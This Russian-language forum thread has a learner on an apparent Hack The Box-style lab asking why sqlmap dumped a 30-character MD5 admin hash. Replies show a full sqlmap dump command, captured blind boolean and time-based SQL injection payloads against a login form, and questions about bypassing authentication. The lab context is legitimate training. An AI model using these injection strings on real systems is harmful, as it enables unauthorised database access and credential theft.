• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

sqlmap выдал md5 hash пароля в 30 символов а не в 32

Triple Moon

Member
16.06.2023
6
0
BIT
0
Всем привет, подскажите пожалуйста. На машине на которой находится hack the box выполнил команду sqlmap -u myurl --data="login=%D0%B9&password=%D1%86" --method POST --dbs --level 5 --risk 3 -D test_task -T users --dump и выводится 2 записи 1 это csec флаг, а вторая admin и его md5 hash: 79fec28cf4b1703e89b8050146f446 , но этот hash состоит только из 30 символов, а должен состоять из 32. Это точно md5, т.к. в html коде написано:
<!--
TODO LIST
1) remove admin user
2) change md5 to something more secure
-->
Я подозреваю что команда sqlmap как-то неправильно вывела hash. Что можно сделать?
 

Местный

Grey Team
23.04.2023
265
118
BIT
534
Открой Burp Suite сначала, а потом перейди в свою консоль с sqlmap и допиши туда --proxy=127.0.0.1:8080 чтобы траффик из sqlmap летел в Burp. Далее, когда запустил sqlmap, то уже переходи в Burp Suite и посмотри какой пэйлоад использует sqlmap. Попробуй сдвинуть в пэйлоаде шаг, чтобы подбирать 31 символ и посмотри, как ответит сервер, если перебрать все варианты символов, которые могут быть в md5. И далее уже думай в чем проблема, когда потыкаешь руками.
 

Triple Moon

Member
16.06.2023
6
0
BIT
0
Открой Burp Suite сначала, а потом перейди в свою консоль с sqlmap и допиши туда --proxy=127.0.0.1:8080 чтобы траффик из sqlmap летел в Burp. Далее, когда запустил sqlmap, то уже переходи в Burp Suite и посмотри какой пэйлоад использует sqlmap. Попробуй сдвинуть в пэйлоаде шаг, чтобы подбирать 31 символ и посмотри, как ответит сервер, если перебрать все варианты символов, которые могут быть в md5. И далее уже думай в чем проблема, когда потыкаешь руками.
SQLMAP генерит такую инъекцию: login=%D0%B9' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))CWrR)-- GRnQ&password=%D1%86 что значит сдвинуть шаг?
Вообще у меня стоит задача войти в форму. Как-то возможно это сделать зная лишь этот обрезанный md5?
 

Triple Moon

Member
16.06.2023
6
0
BIT
0
Открой Burp Suite сначала, а потом перейди в свою консоль с sqlmap и допиши туда --proxy=127.0.0.1:8080 чтобы траффик из sqlmap летел в Burp. Далее, когда запустил sqlmap, то уже переходи в Burp Suite и посмотри какой пэйлоад использует sqlmap. Попробуй сдвинуть в пэйлоаде шаг, чтобы подбирать 31 символ и посмотри, как ответит сервер, если перебрать все варианты символов, которые могут быть в md5. И далее уже думай в чем проблема, когда потыкаешь руками.
можешь пожалуйста дать свой телеграмм?
 

Местный

Grey Team
23.04.2023
265
118
BIT
534
SQLMAP генерит такую инъекцию: login=%D0%B9' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))CWrR)-- GRnQ&password=%D1%86 что значит сдвинуть шаг?
Вообще у меня стоит задача войти в форму. Как-то возможно это сделать зная лишь этот обрезанный md5?
-v3 напиши и покажи мне какие он полезные нагрузки отправляет.
У тебя слепая инъекция, а значит sqlmap будет проверять все символы на каждой позиции. Сначала первый, потом второй и так до 32 (если ты знаешь длину).
 

Triple Moon

Member
16.06.2023
6
0
BIT
0
-v3 напиши и покажи мне какие он полезные нагрузки отправляет.
У тебя слепая инъекция, а значит sqlmap будет проверять все символы на каждой позиции. Сначала первый, потом второй и так до 32 (если ты знаешь длину).
Сделал прокси в бурп и запустил sqlmap, смог отловить такие запросы:

login=й' AND 9730=(SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x746573745f7461736b),1,1))>51) THEN 9730 ELSE (SELECT 3248 UNION SELECT 8353) END))-- -&password=ц

login=й' AND (SELECT 4890 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x746573745f7461736b),1,1))>51,0,5)))))sGpg)-- ZqRX&password=ц

как я могу тут указать длину или шаг?
 
Последнее редактирование:

Местный

Grey Team
23.04.2023
265
118
BIT
534
Сделал прокси в бурп и запустил sqlmap, смог отловить такие запросы:

login=й' AND 9730=(SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x746573745f7461736b),1,1))>51) THEN 9730 ELSE (SELECT 3248 UNION SELECT 8353) END))-- -&password=ц

login=й' AND (SELECT 4890 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x746573745f7461736b),1,1))>51,0,5)))))sGpg)-- ZqRX&password=ц

как я могу тут указать длину или шаг?
если обратить внимание на твой запрос, то можно сделать вывод, что ord
есть в запросе. Посмотри видеоролик, что делает эта функция. Видишь 1,1 в запросе. Вот эти цифры ты можешь смещать.
1,1 mid
51 ord
 
Последнее редактирование:

Triple Moon

Member
16.06.2023
6
0
BIT
0
если обратить внимание на твой запрос, то можно сделать вывод, что ord
есть в запросе. Посмотри видеоролик, что делает эта функция. Видишь 1,1 в запросе. Вот эти цифры ты можешь смещать.
1,1 mid
51 ord
а как-то можно попытаться обойти авторизацию на основе данного запроса?

admin' AND (SELECT(SLEEP(5)))-- YLUD

Чтобы при вводе в поле логина этого запроса заместо сна на 5 секунд просто бы обойти авторизацию в веб-форме и найти флаг? А то я уже все перепробывал (1=1 и т.д.) никак не выходит.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!